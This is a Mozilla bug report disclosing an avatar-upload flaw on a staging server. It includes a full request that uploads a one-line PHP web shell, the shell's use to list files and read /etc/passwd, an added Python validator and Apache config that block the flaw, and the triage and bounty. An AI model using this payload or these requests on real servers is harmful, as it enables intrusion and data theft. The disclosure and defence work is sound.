Closed Bug 661344 Opened 14 years ago Closed 14 years ago

Arbitrary file uploading vulnerability in badger.stage.mozilla.com

Categories: Websites :: Other, defect
Type: defect
Priority: Not set
Severity: blocker

Tracking: Not tracked

Status: VERIFIED FIXED

People

(Reporter: luca.defulgentis, Unassigned)


Details

(Keywords: reporter-external, Whiteboard: [infrasec:osinject][ws:critical])

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier:

Hello Mozilla,

I found a critical vulnerability in badger.stage.mozilla.com's avatar image upload functionality. I was able to upload a PHP shell and execute commands on the remote server.

The following is an HTTP request resulting in a web shell upload:

POST /avatar/change/ HTTP/1.1
Host: badger.stage.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://badger.stage.mozilla.com/avatar/change/
Cookie: csrftoken=c0660b8a28bcb9cb1d81cb8c39f0c7ff; sessionid=9b456284ccc6788d116b0655c6314d49
Content-Type: multipart/form-data; boundary=---------------------------8752007212818
Content-Length: 369

-----------------------------8752007212818
Content-Disposition: form-data; name="csrfmiddlewaretoken"

c0660b8a28bcb9cb1d81cb8c39f0c7ff
-----------------------------8752007212818
Content-Disposition: form-data; name="avatar"; filename="c.php"
Content-Type: application/octet-stream

<?php system($_GET['cmd']); ?>
-----------------------------8752007212818--

Here is the output of some commands executed via the remote shell:

http://badger.stage.mozilla.com/site_media/media/avatars/daath1/c.php?cmd=ls%20-al%20/data/www/www.mozilla.org/

total 488
drwxr-xr-x  46 root root   4096 May 31 20:20 .
drwxr-xr-x 115 root root   4096 Mar  1 20:05 ..
-rw-r--r--   1 root root 117388 Apr 19 19:50 .htaccess
drwxr-xr-x   6 root root   4096 May 31 20:20 .svn
-rw-r--r--   1 root root   1245 Apr 19 19:50 403.html
-rw-r--r--   1 root root   2376 Apr 19 19:50 404.html
-rw-r--r--   1 root root    697 Apr 19 19:50 410.html
-rw-r--r--   1 root root   1120 Apr 19 19:50 500.html
-rw-r--r--   1 root root    413 Aug 11  2009 503.html
drwxr-xr-x   5 root root   4096 May  4 06:52 MPL
-rw-r--r--   1 root root   1695 May 10 21:20 README
drwxr-xr-x   7 root root   4096 Apr 14 15:10 about
drwxr-xr-x  13 root root   4096 Feb 10 17:10 access
drwxr-xr-x   3 root root   4096 Aug 25  2009 book
drwxr-xr-x   4 root root   4096 Aug 21  2009 cache
drwxr-xr-x   5 root root   4096 Feb 10 17:10 causes
drwxr-xr-x   4 root root   4096 Feb 18 22:20 community
drwxr-xr-x   3 root root   4096 Dec  8 13:11 contact
drwxr-xr-x   7 root root   4096 May 27 13:30 contribute
drwxr-xr-x   3 root root   4096 Feb 10 17:10 credits
lrwxrwxrwx   1 root root      5 Aug 25  2009 css -> style
drwxr-xr-x   3 root root   4096 Feb 18 22:20 developer
drwxr-xr-x   9 root root   4096 Aug 26  2009 directory
drwxr-xr-x   8 root root   4096 Dec  8 13:10 docs
drwxr-xr-x   6 root root   4096 Feb  1 09:10 drumbeat
drwxr-xr-x   8 root root   4096 Dec  8 13:11 editor
-rw-r--r--   1 root root   1406 Jul 29  2009 favicon.ico
drwxr-xr-x   3 root root   4096 Feb 18 22:20 firefox
drwxr-xr-x  11 root root   4096 Feb 24 12:10 foundation
drwxr-xr-x  12 root root   4096 Dec  8 13:10 grants
drwxr-xr-x   7 root root   4096 Feb 10 17:10 hacking
drwxr-xr-x  12 root root  12288 Mar 23 15:01 images
drwxr-xr-x   6 root root   4096 May 11 13:10 includes
-rw-r--r--   1 root root  21581 Feb 10 17:10 index.de.html
-rw-r--r--   1 root root  21463 Feb 10 17:10 index.fr.html
-rw-r--r--   1 root root  21197 Feb 10 17:10 index.hr.html
-rw-r--r--   1 root root  20988 Apr 14 15:20 index.html
-rw-r--r--   1 root root  17234 May 31 20:20 index.pt-BR.html
-rw-r--r--   1 root root  21475 Feb 10 17:10 index.sq.html
drwxr-xr-x   6 root root   4096 May 30 08:30 join
drwxr-xr-x  12 root root   4096 Dec  8 13:11 js
drwxr-xr-x   4 root root   4096 Jul 29  2009 keymaster
drwxr-xr-x   4 root root   4096 Jul 29  2009 legal
drwxr-xr-x  11 root root   4096 Dec  8 13:10 newlayout
drwxr-xr-x   6 root root   4096 Feb 10 17:10 parks
drwxr-xr-x  10 root root   4096 Aug 25  2009 performance
drwxr-xr-x   5 root root   4096 May 18 12:01 phonebook
drwxr-xr-x   8 root root   4096 Aug 11  2009 ports
drwxr-xr-x   3 root root   4096 Feb 10 17:10 privacy
drwxr-xr-x  37 root root   4096 Feb 18 22:20 projects
drwxr-xr-x   4 root root   4096 Dec  8 13:11 rdf
-rw-r--r--   1 root root   1138 Oct 21  2009 refresh-press-center-feed.php
drwxr-xr-x   4 root root   4096 Feb 10 17:10 rhino
drwxr-xr-x   4 root root   4096 Dec  8 13:11 script
drwxr-xr-x   4 root root   4096 Aug 31  2009 scriptable
drwxr-xr-x   5 root root   4096 Feb 10 17:10 security
drwxr-xr-x   3 root root   4096 Dec  8 13:11 start
drwxr-xr-x   7 root root   4096 May 31 20:20 style
drwxr-xr-x   3 root root   4096 Dec  8 13:11 support
drwxr-xr-x   4 root root   4096 Dec  4  2009 test-l10n
drwxr-xr-x   5 root root   4096 Jul 29  2009 themes
drwxr-xr-x   4 root root   4096 Dec  8 13:10 unix

http://badger.stage.mozilla.com/site_media/media/avatars/daath1/c.php?cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nagios:x:100:101:nagios:/var/log/nagios:/bin/sh
apache:x:48:48:Apache:/var/www:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
splunk:x:500:500:Splunk Server:/opt/splunk:/bin/false
hpsmh:x:101:501::/opt/hp/hpsmh:/sbin/nologin
ganglia:x:102:102:Ganglia Monitoring System:/var/lib/ganglia:/sbin/nologin
avahi-autoipd:x:103:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
memcached:x:104:104:Memcached daemon:/var/run/memcached:/sbin/nologin
processor:x:501:502::/home/processor:/bin/bash
lars:x:502:503::/home/lars:/bin/bash
rabbitmq:x:105:105:RabbitMQ messaging server:/var/lib/rabbitmq:/bin/bash
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin

Thanks,
Luca.

Reproducible: Always
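The report above works because the avatar handler trusted the client-supplied filename ("c.php") and Content-Type, wrote the file under a web-served directory, and that directory was allowed to execute PHP. The following is an added example of the server-side validation that closes that class of bug; it is not code from the badger project, and the allowlisted image types, size limit, sample inputs and the Apache directory stanza are assumptions chosen for illustration. The one sample input that is not constructed is the PHP body from the request in the report, reused here only as the thing the validator must reject.

```python
"""Added example (not the badger project's code): validating an avatar
upload so a non-image body can never be stored under a script-like name.

Three independent defences are shown; each alone would have stopped the
report's c.php from becoming a web shell:
  1. decide the file type from its bytes, never from the client's filename
     or Content-Type (both are attacker-controlled fields in a multipart body);
  2. store under a server-chosen random name whose extension comes from the
     sniffed type, so the client's "c.php" never reaches disk;
  3. serve the upload directory with script execution disabled (shown as
     the Apache stanza an operator would deploy beside the code).
"""
import os
import secrets
from dataclasses import dataclass
from typing import Optional

# Magic-byte prefixes for the image types an avatar field accepts.
# Hypothetical allowlist chosen for this example.
_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
_ALLOWED_EXTENSIONS = ("png", "jpg", "jpeg", "gif")
MAX_AVATAR_BYTES = 512 * 1024  # hypothetical size limit

# Assumed Apache stanza (mod_php directive names are real; the path is a
# placeholder): even if a script slips through, it is served as bytes.
APACHE_UPLOAD_DIR_STANZA = """
<Directory "/PATH/TO/site_media/media/avatars">
    php_admin_flag engine off
    RemoveHandler .php .phtml .php3
    Options -ExecCGI
</Directory>
"""

# Constructed sample inputs. SAMPLE_PNG is a PNG signature plus padding
# (enough for the sniffer; a real image would also be decoded, see note).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
# The upload body from the bug report, reused as the rejection case.
REPORTED_PHP_BODY = b"<?php system($_GET['cmd']); ?>"


class InvalidUpload(ValueError):
    """Raised when an upload fails validation; the message is safe to log."""


@dataclass(frozen=True)
class StoredAvatar:
    stored_name: str   # server-chosen, e.g. "3f9a...c2.png"
    image_type: str    # sniffed type, e.g. "png"


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return the image type implied by the leading bytes, or None."""
    for magic, kind in _SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def validate_avatar(data: bytes, client_filename: str, client_content_type: str) -> str:
    """Validate an uploaded avatar body and return its sniffed type.

    The client filename and Content-Type are only checked for consistency;
    they never decide what the file is. Mismatches are rejected, not
    repaired, because a "c.php" / application/octet-stream claim on a
    non-image body is exactly the request shape this bug describes.
    """
    if not data:
        raise InvalidUpload("empty upload")
    if len(data) > MAX_AVATAR_BYTES:
        raise InvalidUpload("upload too large")
    kind = sniff_image_type(data)
    if kind is None:
        raise InvalidUpload("not a supported image")
    ext = os.path.splitext(client_filename)[1].lower().lstrip(".")
    if ext not in _ALLOWED_EXTENSIONS:
        raise InvalidUpload("filename extension not allowed")
    if not client_content_type.lower().startswith("image/"):
        raise InvalidUpload("content-type is not an image type")
    return kind


def is_accepted(data: bytes, client_filename: str, client_content_type: str) -> bool:
    """Boolean wrapper around validate_avatar for callers that just branch."""
    try:
        validate_avatar(data, client_filename, client_content_type)
        return True
    except InvalidUpload:
        return False


def choose_stored_name(data: bytes, client_filename: str, client_content_type: str) -> StoredAvatar:
    """Validate, then assign a random name; the client filename is discarded."""
    kind = validate_avatar(data, client_filename, client_content_type)
    return StoredAvatar(stored_name=f"{secrets.token_hex(16)}.{kind}", image_type=kind)


def save_avatar(data: bytes, client_filename: str, client_content_type: str, upload_dir: str) -> StoredAvatar:
    """Write the validated body under its random name; "xb" refuses to
    overwrite an existing file, so a name collision cannot replace a
    previous user's avatar."""
    stored = choose_stored_name(data, client_filename, client_content_type)
    with open(os.path.join(upload_dir, stored.stored_name), "xb") as fh:
        fh.write(data)
    return stored


if __name__ == "__main__":
    print("png accepted:", is_accepted(SAMPLE_PNG, "me.png", "image/png"))
    print("php rejected:", not is_accepted(REPORTED_PHP_BODY, "c.php", "application/octet-stream"))
```

The signature check is deliberately minimal so the example runs offline; in a real handler the accepted body would additionally be decoded by an image library and re-encoded before storage, which strips trailing payloads appended after a valid image header. The Apache stanza is the defence that does not depend on the application being correct at all, which is why it belongs in the deployment regardless of how good the validator is.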
Whiteboard: [ws:critical]
Thanks for the report, Luca. We're looking into the issue now.
Severity: normal → blocker
Status: UNCONFIRMED → NEW
Ever confirmed: true
OS: Windows 7 → All
Hardware: x86 → All
Whiteboard: [ws:critical] → [infrasec:osinject][ws:critical]
Bug# 661356 has been filed to disable the staging environment while we work on a fix. Thanks again for the report.
This bug qualifies for the full $3000 web bounty. Thanks!
badger.stage.mozilla.com is now offline per bug 661356. Closing this issue.
Status: NEW → RESOLVED
Closed: 14 years ago
Resolution: --- → FIXED
Note: A root cause investigation for this issue is in progress and captured in bug 662805.
This issue has been resolved; however, bug 662805 contains some ongoing discussion of this and related issues.
Status: RESOLVED → VERIFIED
Group: websites-security
Flags: sec-bounty+